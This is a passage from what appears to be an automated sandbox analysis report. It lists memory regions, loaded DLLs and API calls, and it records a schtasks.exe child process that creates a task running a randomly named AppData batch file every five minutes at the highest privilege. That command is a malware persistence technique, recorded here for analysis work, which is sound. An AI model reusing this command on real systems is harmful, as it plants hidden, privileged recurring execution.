(normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8823 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 8824 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 8825 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 8826 start_va = 0x4990000 end_va = 0x4a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004990000" filename = "" Region: id = 8827 start_va = 0x46e0000 end_va = 0x4709fff entry_point = 0x46e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8828 start_va = 0x4a40000 end_va = 0x4bc7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a40000" filename = "" Region: id = 8829 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8830 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 8831 start_va = 0x45c0000 end_va = 0x45c4fff entry_point = 0x45c0000 region_type = mapped_file name = "takeown.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\takeown.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\takeown.exe.mui") Region: id = 8832 start_va = 0x4bd0000 end_va = 0x4d50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004bd0000" filename = "" Region: id = 8833 start_va = 0x4d60000 end_va = 0x615ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d60000" filename = "" Region: id = 8834 start_va = 0x46e0000 end_va = 0x46e0fff entry_point = 0x0 region_type = private name = "private_0x00000000046e0000" filename = "" Region: id = 8835 start_va = 0x46f0000 end_va = 0x46f0fff entry_point = 0x0 region_type = private name = "private_0x00000000046f0000" filename = "" Region: id = 8849 start_va = 0x6160000 end_va = 0x6496fff entry_point = 0x6160000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8850 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 8851 start_va = 0x74650000 end_va = 0x74677fff entry_point = 0x74650000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Thread: id = 941 os_tid = 0x7f0 Thread: id = 947 os_tid = 0x650 Process: id = "123" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0x7922b000" os_pid = "0x96c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "115" os_parent_pid = "0xdf0" cmd_line = "schtasks /Create /tn DSHCA /tr \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat\" /sc minute /mo 5 /RL HIGHEST /F" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8662 start_va = 0xc00000 end_va = 0xc1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 8663 start_va = 0xc20000 end_va = 0xc21fff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 8664 start_va = 0xc30000 end_va = 0xc43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 8665 start_va = 0xc50000 end_va = 0xc8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 8666 start_va = 0xc90000 end_va = 0xccffff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 8667 start_va = 0xcd0000 end_va = 0xcd3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cd0000" filename = "" Region: id = 8668 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "schtasks.exe" filename = "\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe") Region: id = 8669 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 8670 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8671 start_va = 0x7fd20000 end_va = 0x7fd42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fd20000" filename = "" Region: id = 8672 start_va = 0x7fd43000 end_va = 0x7fd43fff entry_point = 0x0 region_type = private name = "private_0x000000007fd43000" filename = "" Region: id = 8673 start_va = 0x7fd48000 end_va = 0x7fd48fff entry_point = 0x0 region_type = private name = "private_0x000000007fd48000" filename = "" Region: id = 8674 start_va = 0x7fd4d000 end_va = 0x7fd4ffff entry_point = 0x0 region_type = private name = "private_0x000000007fd4d000" filename = "" Region: id = 8675 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8676 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8677 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 8678 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8679 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 8680 start_va = 0xce0000 end_va = 0xce0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8681 start_va = 0xcf0000 end_va = 0xcf1fff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 8718 start_va = 0xee0000 end_va = 0xeeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 8719 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8720 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8721 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8722 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8723 start_va = 0xd00000 end_va = 0xedffff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 8724 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8725 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8726 start_va = 0xc00000 end_va = 0xc0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 8727 start_va = 0x7fc20000 end_va = 0x7fd1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fc20000" filename = "" Region: id = 8852 start_va = 0xd00000 end_va = 0xdbdfff entry_point = 0xd00000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8853 start_va = 0xde0000 end_va = 0xedffff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 8854 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8855 start_va = 0xef0000 end_va = 0xf2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 8856 start_va = 0xf30000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 8857 start_va = 0x76ce0000 end_va = 0x76d71fff entry_point = 0x76ce0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 8858 start_va = 0x7fd4a000 end_va = 0x7fd4cfff entry_point = 0x0 region_type = private name = "private_0x000000007fd4a000" filename = "" Region: id = 8859 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 8860 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8861 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8862 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8863 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8864 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8865 start_va = 0xc10000 end_va = 0xc13fff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 8866 start_va = 0x50c0000 end_va = 0x52bffff entry_point = 0x0 region_type = private name = "private_0x00000000050c0000" filename = "" Region: id = 8867 start_va = 0xf70000 end_va = 0x1058fff entry_point = 0xf70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 8868 start_va = 0xdc0000 end_va = 0xdd2fff entry_point = 0xdc0000 region_type = mapped_file name = "schtasks.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\schtasks.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\schtasks.exe.mui") Region: id = 8869 start_va = 0x52c0000 end_va = 0x55f6fff entry_point = 0x52c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8942 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 8943 start_va = 0xc20000 end_va = 0xc20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 8944 start_va = 0x77670000 end_va = 0x776f1fff entry_point = 0x77670000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 8945 start_va = 0xf70000 end_va = 0xf70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 8946 start_va = 0x73b00000 end_va = 0x73b8bfff entry_point = 0x73b00000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll") Region: id = 8976 start_va = 0x74380000 end_va = 0x743acfff entry_point = 0x74380000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Thread: id = 942 os_tid = 0xea8 [0287.018] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0287.018] __set_app_type (_Type=0x1) [0287.018] __p__fmode () returned 0x77984d6c [0287.018] __p__commode () returned 0x77985b1c [0287.018] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x10a0840) returned 0x0 [0287.018] __wgetmainargs (in: _Argc=0x10aade0, _Argv=0x10aade4, _Env=0x10aade8, _DoWildCard=0, _StartInfo=0x10aadf4 | out: _Argc=0x10aade0, _Argv=0x10aade4, _Env=0x10aade8) returned 0 [0287.018] _onexit (_Func=0x10a2bc0) returned 0x10a2bc0 [0287.018] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0287.018] WinSqmIsOptedIn () returned 0x0 [0287.019] RtlRestoreLastWin32Error () returned 0x0 [0287.019] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0287.019] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0287.019] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0287.019] RtlVerifyVersionInfo (VersionInfo=0xccf7d0, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0 [0287.019] lstrlenW (lpString="") returned 0 [0287.019] SetThreadUILanguage (LangId=0x0) returned 0x409 [0287.048] RtlRestoreLastWin32Error () returned 0x0 [0287.048] _memicmp (_Buf1=0xde7740, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.048] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xde9660, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0287.048] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0xccf8dc | out: lpdwHandle=0xccf8dc) returned 0x76c [0287.785] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0xde9f68 | out: lpData=0xde9f68) returned 1 [0287.785] VerQueryValueW (in: pBlock=0xde9f68, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xccf8e4, puLen=0xccf8e8 | out: lplpBuffer=0xccf8e4*=0xdea318, puLen=0xccf8e8) returned 1 [0287.787] _memicmp (_Buf1=0xde7740, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.787] _vsnwprintf (in: _Buffer=0xde9660, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xccf8c8 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0287.787] VerQueryValueW (in: pBlock=0xde9f68, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xccf8f4, puLen=0xccf8f0 | out: lplpBuffer=0xccf8f4*=0xdea140, puLen=0xccf8f0) returned 1 [0287.787] lstrlenW (lpString="schtasks.exe") returned 12 [0287.787] lstrlenW (lpString="schtasks.exe") returned 12 [0287.787] lstrlenW (lpString=".EXE") returned 4 [0287.787] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0287.787] lstrlenW (lpString="schtasks.exe") returned 12 [0287.787] lstrlenW (lpString=".EXE") returned 4 [0287.787] _memicmp (_Buf1=0xde7740, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.787] lstrlenW (lpString="schtasks") returned 8 [0287.787] _memicmp (_Buf1=0xde7710, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.788] _memicmp (_Buf1=0xde77a0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.788] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0xdea818, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0287.788] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0287.788] _vsnwprintf (in: _Buffer=0xde3d78, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xccf8cc | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0287.788] RtlRestoreLastWin32Error () returned 0x0 [0287.788] GetThreadLocale () returned 0x409 [0287.788] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0287.788] lstrlenW (lpString="?") returned 1 [0287.788] GetThreadLocale () returned 0x409 [0287.788] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0287.788] lstrlenW (lpString="create") returned 6 [0287.788] GetThreadLocale () returned 0x409 [0287.788] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0287.788] lstrlenW (lpString="delete") returned 6 [0287.788] GetThreadLocale () returned 0x409 [0287.788] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0287.788] lstrlenW (lpString="query") returned 5 [0287.788] GetThreadLocale () returned 0x409 [0287.788] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0287.789] lstrlenW (lpString="change") returned 6 [0287.789] GetThreadLocale () returned 0x409 [0287.789] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0287.789] lstrlenW (lpString="run") returned 3 [0287.789] GetThreadLocale () returned 0x409 [0287.789] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0287.789] lstrlenW (lpString="end") returned 3 [0287.789] GetThreadLocale () returned 0x409 [0287.789] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0287.789] lstrlenW (lpString="showsid") returned 7 [0287.789] GetThreadLocale () returned 0x409 [0287.789] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0287.789] RtlRestoreLastWin32Error () returned 0x0 [0287.789] RtlRestoreLastWin32Error () returned 0x0 [0287.789] lstrlenW (lpString="/Create") returned 7 [0287.789] lstrlenW (lpString="-/") returned 2 [0287.789] StrChrIW (lpStart="-/", wMatch=0x52b002f) returned="/" [0287.789] lstrlenW (lpString="?") returned 1 [0287.789] lstrlenW (lpString="?") returned 1 [0287.789] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.789] lstrlenW (lpString="Create") returned 6 [0287.789] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.789] _vsnwprintf (in: _Buffer=0xde7620, _BufferCount=0x4, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|?|") returned 3 [0287.789] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|Create|") returned 8 [0287.789] lstrlenW (lpString="|?|") returned 3 [0287.789] lstrlenW (lpString="|Create|") returned 8 [0287.789] RtlRestoreLastWin32Error () returned 0x490 [0287.789] lstrlenW (lpString="create") returned 6 [0287.789] lstrlenW (lpString="create") returned 6 [0287.789] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.789] lstrlenW (lpString="Create") returned 6 [0287.789] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.789] _vsnwprintf (in: _Buffer=0xde95a0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|create|") returned 8 [0287.789] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|Create|") returned 8 [0287.789] lstrlenW (lpString="|create|") returned 8 [0287.789] lstrlenW (lpString="|Create|") returned 8 [0287.789] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|" [0287.789] RtlRestoreLastWin32Error () returned 0x0 [0287.789] RtlRestoreLastWin32Error () returned 0x0 [0287.789] RtlRestoreLastWin32Error () returned 0x0 [0287.789] lstrlenW (lpString="/tn") returned 3 [0287.790] lstrlenW (lpString="-/") returned 2 [0287.790] StrChrIW (lpStart="-/", wMatch=0x52b002f) returned="/" [0287.790] lstrlenW (lpString="?") returned 1 [0287.790] lstrlenW (lpString="?") returned 1 [0287.790] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.790] lstrlenW (lpString="tn") returned 2 [0287.790] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.790] _vsnwprintf (in: _Buffer=0xde95a0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|?|") returned 3 [0287.790] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|tn|") returned 4 [0287.790] lstrlenW (lpString="|?|") returned 3 [0287.790] lstrlenW (lpString="|tn|") returned 4 [0287.790] RtlRestoreLastWin32Error () returned 0x490 [0287.790] lstrlenW (lpString="create") returned 6 [0287.790] lstrlenW (lpString="create") returned 6 [0287.790] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.790] lstrlenW (lpString="tn") returned 2 [0287.790] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.790] _vsnwprintf (in: _Buffer=0xde95a0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|create|") returned 8 [0287.790] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|tn|") returned 4 [0287.790] lstrlenW (lpString="|create|") returned 8 [0287.790] lstrlenW (lpString="|tn|") returned 4 [0287.790] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0287.790] RtlRestoreLastWin32Error () returned 0x490 [0287.790] lstrlenW (lpString="delete") returned 6 [0287.790] lstrlenW (lpString="delete") returned 6 [0287.790] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.790] lstrlenW (lpString="tn") returned 2 [0287.790] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.790] _vsnwprintf (in: _Buffer=0xde95a0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|delete|") returned 8 [0287.790] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|tn|") returned 4 [0287.790] lstrlenW (lpString="|delete|") returned 8 [0287.790] lstrlenW (lpString="|tn|") returned 4 [0287.790] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0 [0287.790] RtlRestoreLastWin32Error () returned 0x490 [0287.790] lstrlenW (lpString="query") returned 5 [0287.790] lstrlenW (lpString="query") returned 5 [0287.790] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.790] lstrlenW (lpString="tn") returned 2 [0287.790] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.790] _vsnwprintf (in: _Buffer=0xde95a0, _BufferCount=0x8, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|query|") returned 7 [0287.790] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|tn|") returned 4 [0287.790] lstrlenW (lpString="|query|") returned 7 [0287.790] lstrlenW (lpString="|tn|") returned 4 [0287.790] StrStrIW (lpFirst="|query|", lpSrch="|tn|") returned 0x0 [0287.790] RtlRestoreLastWin32Error () returned 0x490 [0287.790] lstrlenW (lpString="change") returned 6 [0287.790] lstrlenW (lpString="change") returned 6 [0287.791] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.791] lstrlenW (lpString="tn") returned 2 [0287.791] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.791] _vsnwprintf (in: _Buffer=0xde95a0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|change|") returned 8 [0287.791] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|tn|") returned 4 [0287.791] lstrlenW (lpString="|change|") returned 8 [0287.791] lstrlenW (lpString="|tn|") returned 4 [0287.791] StrStrIW (lpFirst="|change|", lpSrch="|tn|") returned 0x0 [0287.791] RtlRestoreLastWin32Error () returned 0x490 [0287.791] lstrlenW (lpString="run") returned 3 [0287.791] lstrlenW (lpString="run") returned 3 [0287.791] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.791] lstrlenW (lpString="tn") returned 2 [0287.791] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.791] _vsnwprintf (in: _Buffer=0xde95a0, _BufferCount=0x6, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|run|") returned 5 [0287.791] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|tn|") returned 4 [0287.791] lstrlenW (lpString="|run|") returned 5 [0287.791] lstrlenW (lpString="|tn|") returned 4 [0287.791] StrStrIW (lpFirst="|run|", lpSrch="|tn|") returned 0x0 [0287.791] RtlRestoreLastWin32Error () returned 0x490 [0287.791] lstrlenW (lpString="end") returned 3 [0287.791] lstrlenW (lpString="end") returned 3 [0287.791] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.791] lstrlenW (lpString="tn") returned 2 [0287.791] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.791] _vsnwprintf (in: _Buffer=0xde95a0, _BufferCount=0x6, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|end|") returned 5 [0287.791] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|tn|") returned 4 [0287.791] lstrlenW (lpString="|end|") returned 5 [0287.791] 